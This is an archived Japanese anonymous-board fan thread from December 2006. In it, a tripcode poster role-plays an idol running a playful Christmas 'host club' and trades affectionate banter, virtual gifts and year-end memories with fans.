
321 :ユーは名無しネ:2006/12/20(水) 19:37:07
ゑ様ゑ様
周りは良席祭なのに天井きちゃったよ
もっと近くでゑ様がみたいよどうしようゑ様

322 :ユーは名無しネ:2006/12/23(土) 19:27:28
ゑ様こんばんOne!
クリスマスゑ様に逢えなくてテラサミシス…泣
正月逢えるの楽しみにしてるね(*´∀`*)っ”

323 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 21:30:48
(`へ′)>317
    モシボクガチカクニキタラタクサンアピールシテクダサイネ!


(`へ′)>318
    モー!チャントボクヲミツケテクダサイ!キョウモキマシタ!コンバンハ!


(`へ′)>319
    カッコイイボクヲタクサンミテモラエルヨウニガンガリマス!マタカンソウモキカセテクダサイネ!


(`へ′)>320
    ノロウイルスデスカ!?ソレハタイヘンデス!テアライウガイシテキマス!゙└(`へ′)┐゛ジタバタ


(`へ′)>321
    テンジョウデモサイゼンデモカンケーアリマセン!
    ドコニイテモボクハオネイサンヲミツケダシマス!イッショニタノシミマショウ!


(`へ′)>322
    コンバンOne!ナカナイデクダサイ!クリスマスボクノユメガミレルトイイデスネ!
    マタナデナデサレマシタ!テレテマセン!(*`へ′)

324 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 21:37:27
(`へ′)<イヴハミナサンイソガシイトオモウノデ!
      キョウクリスマスキネンニ[ホストクラブゑ]OPENデス!
      
      キョウノスーツハイノリイショウ、ダイボウケンバーゾンデス!
      ノースリーブデスッゴクサムイデスガ!ガンガリマス!ヨロシク!(`へ′)ノ



(`へ′)<ミナサンクルマデクリスマスメドレーウタイマス!


      ウイアーザーメリーメリースターラーミラクルスターター!
 
      ボウケンヲハジメヨウ!ヒビノシュガーシュガーマウンテン!
      トラブルサエーモタノシメルワナサップライッ!



325 :ユーは名無しネ:2006/12/23(土) 21:47:41
ゑ様こんばんは!
ホストクラブゑ再OPENオメ!クリスマスイブイブオメ!
最近ノースリーブ衣装なかなかお目にかかれなかったので嬉しいです
お寒いようでしたら自分があたためますよ(*´∀`)

326 :ユーは名無しネ:2006/12/23(土) 21:52:37
ゑ様ゑ様こんばんは&メリークリスマス!
ホストクラブゑキャー∩(´∀`∩)(∩´∀`)∩キャー

祈り衣装のゑ様の細い二の腕テラモエス(*´Д`)
またあのノースリーブ姿に帽子のゑ様お正月に見たいな
葡萄缶で着て欲しいけどさすがにあの広い会場では寒いよね?(w

327 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 22:01:41
(`へ′)>325
    メリークリスマス!オネイサンガキテクレタラサムサナンカンジマセン!
    ノースリーブニンキデス!ソンナニボクノニノウデイイデスカ?


(`へ′)>326
    ウデホソイケドキンニクモチャントツイテマス!
    ココダケノハナシボクケッコウヌイダラスゴインデス!ヌギマセンガ!

328 :ユーは名無しネ:2006/12/23(土) 22:07:07
自分もゑ様と>326姐さんでみんな一緒にいるからあたたかいよ
ゑ様の左腕にあるホクロがすごくスチなんだ(*´∀`)
リレーのタンクトップ姿も大スチです

329 :ユーは名無しネ:2006/12/23(土) 22:09:56
ゑ様ゑ様
祈り衣装で何か
口説き文句言ってホシス

330 :ユーは名無しネ:2006/12/23(土) 22:15:02
ゑ様が脱いだら自分は発狂しますorz
アウターから覗く黒タンクだけでも
ゑ様が脱いだらすごいって分かりますよ(*´∀`)

331 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 22:18:51
(`へ′)>328
    ミンナトイッショデイインデスカ??ホントウハ2リッキリガイインジャナイデスカ???
    …スイマセン!チョットオラオラエイギョウニナッチャイマシタ!!


(`へ′)>329
    ヒザマヅイテオレノアシニキスヲシロ!2カイクライ!


(`へ′)>330
    ドンドンハッキョウシテクダサイ!ボクタチハハッキョウサレテナンボデスカラ!
    アウター!ナンカイヤナコトヲオモイダシマシタ!(;`へ′)

332 :ユーは名無しネ:2006/12/23(土) 22:23:29
ゑ様のオラオラ営業(*´Д`*)ハァハァ
もちろん!ゑ様と2人っきりがいいですけど…
姐さんたちに怒られちゃうもん
でも明日の夜空けとくね(*´∀`)ノ

333 :ユーは名無しネ:2006/12/23(土) 22:31:01
ゑ様(*´Д`)ハーン
2回とは言わず何回でも(w
素敵はクリスマスプレゼントになったよdd!

334 :ユーは名無しネ:2006/12/23(土) 22:34:42
ゑ様お言葉に甘えて来年も発狂しつづけますorz
アウターはわざと言ってみたよ(w
あの時のしゃがみながら照れるゑ様キャワキャワ

335 :ユーは名無しネ:2006/12/23(土) 22:39:44
ゑ様ゑ様こんばんはノシ
そしてメリークリスマスイブイブ!
少蔵のクリスマスSPのゑ様映り込みをチェックしてたら遅くなっちゃったよorz
ホストクラブゑ懐かしいね(*´∀`)
今日は家にあったこんなもの持って来たよつ【ミッキーマウスの半熟チーズケーキ】
良かったら姐さん方もドゾ

336 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 22:46:32
(`へ′)>332
    アシタデスカ?2リキリノボクハナニスルカワカリマセンヨ!(*`▽′*)デヘ!
    ソウデスソウデス!ボクハミンナノアイドルデス!タッタヒトリノアイドルニハナレマセン!
    デモオネイサンニトッテボクハタッタヒトリノアイドルダトシンジテマス!


(`へ′)>333
    333サンハボクノトリコニナリマシタ!ト、オモウコトニシマス!


(`へ′)>334
    アウターハコトシハズカシカッタコトベスト3ニハイルイキオイデス!
    シカモミンナガボクヲイジッテシドイ!!


(`へ′)>335
    コンバンハ!マッテマシタ!
    つ【ミッキーマウスの半熟チーズケーキ】アリガゑゑ!
    ショウクラハアシノデバンスクナカッタデスヨネ!チョットフマンデス!(#`〜′)モグモグ



ボクカラモミナサンニプレゼントデス!

 ∞
(`へ′)<リボンツケマシタ!コンナボクジャプレゼントニナリマセンカ?

337 :ユーは名無しネ:2006/12/23(土) 22:52:12
ゑ様は自分にとってたった1人のアイドルだよ
でもクリスマスなのでちょっと甘えちゃうね
 ∞ ∞
(`へ′)人(´∀`*)お揃いです
ステチなプレゼントをありがdゑ様!

338 :ユーは名無しネ:2006/12/23(土) 22:54:26
リボンゑ様ハァ━━━━━━*´Д`*━━━━━━ン!!
プレゼントにならないどころかゑ様は自分には勿体無すぎるので
少蔵EDで玉にあげてたバラの花束を是非自分にください(*´∀`)

339 :ユーは名無しネ:2006/12/23(土) 22:54:38
ゑ様がプレゼントなんてハァ━━━ *´Д`* ━━━ン!!
ゑ様リボンに一瞬クスっとしちゃってごめんなさい(w
でもでもとってもキャワユスです(*´∀`)

>335姐さん
つ【ミッキーマウスの半熟チーズケーキ】dd!

340 :337:2006/12/23(土) 22:55:16
ずれちゃったよ残念(´Д⊂ヽ
こんな自分はもうお家帰りますね
年内中にまたゑ様に会えますように(*´人`)
それではまたノシ

341 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 23:07:28
(`へ′)>337
     ∞     ∞
    (`へ′)人(*´∀`)シュウセイデス!イツマデモボクダケヲミテテクダサイ!


(`へ′)>338
    アレハタマクンヲオネイサンタチノツモリデワタシマシタ!ナノデハナタバモオネイサンノモノデス!
    デモソノアトノミヒィクンニスベテモッテイカレタヨウガキガシマス!シンジラレナイ!


(`へ′)>339
    リボンノイチオカシカッタデスカ?ナンカヨクミタラアフォポイデスネ!
    デモイイデス!オネイサンノエガオガミレタカラ!!


(`へ′)>340
    ℃クンクサスルキミモカワイイヨ!
    ナンテホストダカラコンナクサイコトイッテモイイデスヨネ!(*`▽′*)デヘ!
    オヤスミパイナップゑ!

342 :ユーは名無しネ:2006/12/23(土) 23:18:57
じゃあ遠慮なくあのバラの花束玉から頂きますねノシ
ゑ様もミヒィに負けないようなプロポーズみたいなのをここの姐さん方にしてホスィな(*´∀`)
ゑ様のプロポーズwktk

343 :ユーは名無しネ:2006/12/23(土) 23:23:10
ゑ様自分もぶっちゃけゑ様の花束ハーンと
思った後にミヒィに目が行きました(w
ゑ様のプロポーズクルー?wktk(*´Д`)

344 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 23:32:14
(`へ′)>342
    プロポーズナンテマダマダサキデスガ!ハズカシイケドクリスマスダカラトクベツデス!
    チャントミテテクダサイ!


(`へ′)>343
    オネイサン!ボクカラメヲハナサナイデクダサイ!
    デハイキマス!


m9(`へ′)<ボクノトナリニ終身刑!(←アエテカンジデ)

345 :ユーは名無しネ:2006/12/23(土) 23:37:46
あえて漢字のゑ様ハァ━━━━━━*´Д`*━━━━━━ン!!
プロポーズでも℃Sなゑ様ハァ━━━━━━*´Д`*━━━━━━ン!!

実は今日ゑ様意外の人に浮気しそうになったけどヤパーリゑ様だいしてるよorz

346 :ユーは名無しネ:2006/12/23(土) 23:41:29
ゑ様ゑ様ハァ━━━ *´Д`* ━━━ン!!

思わず絶叫しちゃいました(;´Д`)
指さされてもう自分倒れそうです
>┼○バタリ

347 :ユーは名無しネ:2006/12/23(土) 23:46:24
ゑ様テラテラカコヨスです
祈り衣装で言ってくれたんだよね?
_ト ̄|○

348 :345:2006/12/23(土) 23:49:47
○以外
×意外
ゑ様のプロポーズに戸惑って℃んくさしちゃったと許してくださいorz

349 :(*`へ′) ◆JUowmt7f2Y :2006/12/23(土) 23:57:56
(`へ′)<オチツテイクダサイ!ゴセイシュクニ!


(`へ′)>345
    イロンナヒトヲミルコトハイイトオモイマス!
    デモキットサイゴニハボクノトコロヘモドッテキテクレルトシンジテマスカラ!


(`へ′)>346
    ギャー!オネイサンタオレテマス!ダイジョウブデスカ!
    つ【水】トリアエズノンデクダサイ!


(`へ′)>347
    モチノロンロンデス!モウノースリーブノサムサナンテドッカイキマシタ!
    ギャクニアツイクライデス!


(`へ′)>348
    ユルシマセン!コンヤハネカシマセン!ナンチャッテー!(*`▽′*)デヘ!

350 :ユーは名無しネ:2006/12/24(日) 00:02:23
ゑ様大丈夫じゃないです つ【水】dd!
今夜はドチドチして眠れなさそうだけど朝早いのでうにしますね
ゑ様のスーツ姿カコヨスでした(*´∀`)
ゑ様姐さん方オヤスミパイナップゑゑ!

351 :ユーは名無しネ:2006/12/24(日) 00:06:51
ゑ様の寝かさない発言にもハァ━━━━━━*´Д`*━━━━━━ン!!
ちゃんとゑ様のところに戻ってきたよノシ
自分はカナーリゑ様依存症みたいだorz

>350姐さんオヤスミパイナップゑ!

352 :(*`へ′) ◆JUowmt7f2Y :2006/12/24(日) 00:29:18
(`へ′)>350
    ユメノナカデモボクトアエルトイイデスネ!ユクーリウニッテクダサイ!
    オヤスミパイナップゑゑ!


(`へ′)>351
    キョウハワイルドナボクデシタ!
    オネイサンタチニユメヲアタエルノガボクタチノヤクメデス!ドンットヨリカカッテクダサイ!


(`へ′)<[ホストクラブゑ CLOSED]ミナサンキテクレテアリガトウゴザイマシタ!
    ココカラハアフターニナリマス!オキテタラコエカケテクダサイ!
    ボクモウチョットオキテマスカラ!

353 :ユーは名無しネ:2006/12/24(日) 00:36:13
ゑ様ゑ様
自分今きましたホストクラブ閉店で寂しいです(´・ω・`)
なので焼肉にお誘いしますので行きませんか?(*´∀`)ノ

354 :ユーは名無しネ:2006/12/24(日) 00:36:16
ゑ様こんばんはノシ
ホストクラブゑとても楽しそうだね(*´∀`)
今日は出遅れたけどまたお店開くときはお花持って行きますね

355 :(*`へ′) ◆JUowmt7f2Y :2006/12/24(日) 00:46:08
(`へ′)>353
    アフターノオサソイキタ―――(`へ′)―――!!
    ヤキニクイキマショウ!マチノイルミネーションガキレイデスネ!


(`へ′)>354
    ボクヒトリデホールトセッキャクヤッテルノデケッコウイソガシイデス!
    ケドフダンオウエンシテクレルオネイサンタチヘオカエシノツモリデスカラ!
    ツギハゼッタイマッテマス! 

356 :ユーは名無しネ:2006/12/24(日) 00:51:28
お客さんがたくさん来る中みんな全員に接客してるゑ様すごいよ
大変になったら自分雇ってくださいね
お掃除とか頑張っちゃうから(`・ω・´)

357 :353:2006/12/24(日) 00:52:44
ゑ様少ないけどボーナス出たからバッチリ奢っちゃいます
3秒違いの>354姐さんも誘って3人でオールいっちゃいましょう!

358 :(*`へ′) ◆JUowmt7f2Y :2006/12/24(日) 00:59:25
(`へ′)>356
    オネイサンニソウジヲサセルワケニハイキマセン!オネイサンノキレイナテガヨゴレテシマイマス!
    モシイソガシクナッタラミヒィクンニデモテツダイニキテモライマスカラ!!(*`▽′*)デヘ!


(`へ′)>357
    ジョセイニオカネヲツカワセルワケニハイキマセン!
    ココハオトコトシテボクニマカセテクダサイ!
    オールデキルカワカリマセンガミナサンドゾー!つ【叙々苑特上ロース】】】

359 :ユーは名無しネ:2006/12/24(日) 01:05:03
それじゃあミヒィには頑張っていただかないとね(w

>357姐さんお誘いdです!テラウレシス(*´∀`)
ゑ様もd!ありがたくいただいちゃいますねつ【叙々苑特上ロース】
自分はケーキを準備いたしました!つ凸凸凸

360 :ユーは名無しネ:2006/12/24(日) 01:08:49
イブにゑ様に奢ってもらえるなんて幸せですご馳走様です
じゃあ自分はこれをつ【シャンパン】
ゑ様は二十歳だからもう大丈夫ですよね?

361 :(*`へ′) ◆JUowmt7f2Y :2006/12/24(日) 01:16:29
(`へ′)>359
    つ凸アリガゑゑ!オモシロイカタチデスネ!タシカコンナヒトイマシタヨネ!(`〜′)モグ
    イヴクライタベテノンデシチャイマショウ!スコシプニットシテモボクハキニシマセン!


(`へ′)>360
    つY シャンパンドウモデス!キミノヒトミニ…カンパイ!
    1ドイッテミタカッタンデス!(*`▽′*)デヘ!
    ハイ!ボクモオカゲサマデライネンセイジンシキヲムカエルコトニナリマシタ!

362 :ユーは名無しネ:2006/12/24(日) 01:23:31
凸…気にせず食べちゃいます(*´〜`)モグ
そしてゑ様と同じく来年成人式を迎える自分も
>360姐さんからのシャンパンをありがたくいただきますね(*´∀`)つY

363 :(*`へ′) ◆JUowmt7f2Y :2006/12/24(日) 01:39:00
(`へ′)>362
    セイジンオメデトウゴザイマス!イッショニセイジンヲムカエマショウネ!
    コトシハCMニモデタシ!20サイノボクハドラマトカチャンジシタイデス!


(`へ′)<オネイサンソロソロスイマーガオソッテキマシタ!…スイマセン!
      ミンナトオハナシモデキタシヤキニクモケーキモタベラレテムネイッパイデス!
      オヤスミパイナップゑ!ミナサンタノシイクリスマスヲ!(`へ′)ノMerry X'mas!

364 :ユーは名無しネ:2006/12/24(日) 01:42:27
ゑ様も成人オメ!お互い充実した20歳を送ろうね(*´∀`)
お酒弱い自分もスイマーが襲ってきました
ゑ様と姐さん方とのひと時楽しかったよまたやろうね
それではオヤスミパイナップゑ!メリクリ!

365 :ユーは名無しネ:2006/12/24(日) 01:47:03
ゑ様シャンパンで酔ってしまったんですね(*´∀`)
朝起きたらこれ食べてくださいつ【お粥】
オヤスミパイナップゑ! 

366 :ユーは名無しネ:2006/12/24(日) 22:10:34
ゑ様まさかクリスマスイブにゑ様に会えるなんて!
あのジャケットは衣装なのかと思うくらい素敵でハァ━━━━━*´Д`*━━━ンです
ゑ様というクリスマスプレゼントしっかり心に受け取りました(*´∀`)

367 :ユーは名無しネ:2006/12/24(日) 22:20:52
ゑ様こんばんOne!
昨日は[ホストクラブゑ]乙鰈〜デスタ(*´∀`*)/”
今日しゅうまいコンサートに来てらしたんデスネ!
お会いしたかったデス(*´д`・)
あたしの夢には今夜登場してくれるとシンジテます♪

368 :ユーは名無しネ:2006/12/24(日) 23:16:50
ゑ様ラメ入りアウターお似合いでした
ゑ様はパーカーお好きなんですね
素敵なクリプレありがd

369 :(*`へ′) ◆JUowmt7f2Y :2006/12/29(金) 22:09:47
(`へ′)>364
    ボクモトッテモタノシカッタデス!ハタチノボクモオウエンヨロシクオナガイシマス!


(`へ′)>365
    つ【お粥】アリガゑゑ!ボクヨッテタンデショウカ!キオクガナイノハタシカデス!


(`へ′)>366
    イショウダナンテ!ウレシイデスネ!アサガンガッテフクヲエランダカイガアリマシタ!


(`へ′)>367
    ボクトユメデアイエマシタカ?♪ヤ/” ハツボデツカウトウイテシマイマス!
    スコシホカノオネイサンタチノレスヲミテベンキョウシテミマショウ!


(`へ′)>368
    ミンナニシフクヲミラレテチョットハズカシイデス!デモアリノママノボクヲミテモラエテウレシカッタリモシマス!(*`へ′*)テレ!

370 :ユーは名無しネ:2006/12/29(金) 22:20:26
ゑ様ゑ様
今日は横蟻に行ってたそうですね
勉強頑張ってください

371 :ユーは名無しネ:2006/12/29(金) 22:31:16
ゑ様ゑ様お久しぶりですノシ
最近ゑ様に会えなかったし葡萄缶にも会いに行けないしで浮気しそうですorz
ゑ様だいしてるんだけど他の人も気になるんだどうしよう(´・ω・`)

372 :(*`へ′) ◆JUowmt7f2Y :2006/12/29(金) 22:41:16
(`へ′)>370
    コンバンワラゑ!マタマタヨコアリトウジョウシチャイマシタ!ボクモハヤクステージガワニタチタイデス!


(`へ′)>371
    オヒサリブリデス!ドウモドウモ!
    ソレハコマリマス!ボクハオネイサンノコトスキデス!!
    

373 :ユーは名無しネ:2006/12/29(金) 23:10:40
ゑ様ノシ
ゑ様アンテナが反応したので来てみたらゑ様が…!
これって恋…!?

374 :ユーは名無しネ:2006/12/29(金) 23:11:08
ゑ様にスチって言ってもらえてテラウレシス(*´∀`)
葡萄缶行けナスだけどレポで満足出来るようにゑ様イパーイ活躍してきてねノシ
じゃないと本気で浮気しようとちゃいますよ(w
ところでゑ様今日は2人っきりみたいだね今から何しますか?

375 :(*`へ′) ◆JUowmt7f2Y :2006/12/29(金) 23:22:41
(`へ′)>373
    ミヤtクンコンバンハ!ボクウホッデハナイノデコイトカヤメテクダサイ!!


(`へ′)>374
    ウワキシチャウトカソンナカナシイコトイワナイデクダサイ!(⊃へ⊂)
    ナ、ナ、ナニヲスルツモリデスカ!ボクニヘンナコトシナイデクダサイネ!


(`へ′)<2007ネンマデアト48ジカンデス!ココトシ1ネンヲフリカエッテミマセンカ?
      ボクタチトノオモイデハデキマシタカ??

376 :ユーは名無しネ:2006/12/29(金) 23:39:24
ゑ様がゑ様らしくモヘさせてくれればきっと浮気する気にはならないので大丈夫ですノシ

今年はゑ様とイパーイ思い出作れたよ(*´∀`)
実は初の遠征が大冒険で、ゑ様を間近で見れて思わず泣いちゃったんだ
大運動会も親に呆れられたけど、今後しばらく遠征しないって決めて
見に行ったらリレーゑ様とタンバリンゑ様そしてチョンマゲゑ様を見れたよノシ
今年は良い意味でゑ様に振り回されっぱなしの一年でした

377 :(*`へ′) ◆JUowmt7f2Y :2006/12/29(金) 23:51:16
(`へ′)>376
    ボクノタメニエンセイマデシテクレタンデスネ!カゾクノミナサンニボクガヨロシクイッテタトツタエテクダサイ!
    ボクヲミテナイチャウナンテカワイイナー!(*`▽′*)
    ウンドウカイデハミンナノオウエンノオカゲデアシデ1イヲトルコトガデキタシマンゾクデス!
    アシッテホントウイイユニデスヨネ!ジガジサンデス!!


(`へ′)<チョウブンシツレイシマシタ!


378 :ユーは名無しネ:2006/12/29(金) 23:52:26
ゑ様自分もゑ様の思い出いっぱい出来たよ
ほりべやすべえもリストラもそれでは示しがつきませぬも暗記するほど通ったよ
来年もいっぱいゑ様の笑顔に会えますように

379 :(*`へ′) ◆JUowmt7f2Y :2006/12/29(金) 23:58:44
(`へ′)>378
    アンキデスカ!ボクガカゼヲヒイタラオネイサンニダイヤクヲタノメマスネ!
    ライネンモヤエバミセテワライマス!(*`▽′*)ニコ!

380 :ユーは名無しネ:2006/12/30(土) 00:06:03
ゑ様長文d!
自分も足って良いユニだとオモーし、足のみんなだいしてます(*´∀`)
来年もゑ様らしく足らしく活動してね
今年は本当にdでした!来年もよろしくおながいします

ゑ様に直接言うのは最後かな?
そういえばこれが発覚したのも今年だよね
オヤスミパイナップゑ!

381 :(*`へ′) ◆JUowmt7f2Y :2006/12/30(土) 00:17:12
(`へ′)>380
    ミンナヲダイシテルナンテウレシイデス!キットミヒィクンナンテトンデヨロコブトオモイマス!
    ソウデスソウデス!ダイボウケンデビジョクンガボクノメールヲカミングアウトシタンデス!
    デモミンナニツカッテモラエテコウエイデス!オヤスミパイナップゑ!


(`へ′)<アト47ジカンニナリマシタ!ナンダカチョッピリセツナイデス!

382 :ユーは名無しネ:2006/12/30(土) 00:25:32
ゑ様切ないなら自分のお部屋に遊びにきてください
ホットミルクとココアと柚子茶なんでも揃えて待ってます(*´∀`)

ドームでゑ様に始まってドームでゑ様で終われる今年一年本当に幸せです

383 :(*`へ′) ◆JUowmt7f2Y :2006/12/30(土) 00:32:32
(`へ′)>382
    ドームニアイニキテクレルンデスカ?ボクイッショウケンメイサガシマス!アピールシテクダサイネ!
    オヘヤニアソビニイクコトハデキマセン!ボクハミンナノアイ$デス!デモココアノミタイデス!(*`へ′*)

384 :ユーは名無しネ:2006/12/30(土) 00:56:31
367です
ゑ様ゴメンナサイ(´-ω-`)
勉強してまた会いに来ます!

385 :(*`へ′) ◆JUowmt7f2Y :2006/12/30(土) 01:05:21
(`へ′)>384
    ゲンキダシテクダサイ!マタタノシクオハナシシマショウ!エガオガ1バンデス!(*`▽′*)


(`へ′)<コトシモ1ネンオセワニナリマシタ!ライネンモカッコイイッテイッテモラエルヨウニガンガリマス!
      オヤスミパイナップゑゑゑ!ヨイオトシヲ!!(`へ′)ノ

386 :ユーは名無しネ:2006/12/30(土) 01:36:07
ゑ様ゑ様
今年はゑ様達に逢える機会が沢山あってウレシスだったよ
来年も変わらず足とゑ様をだいし続けます
ゑ様も良いお年を(*´∀`)ノシ
オヤスミパイナップゑ!

93 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)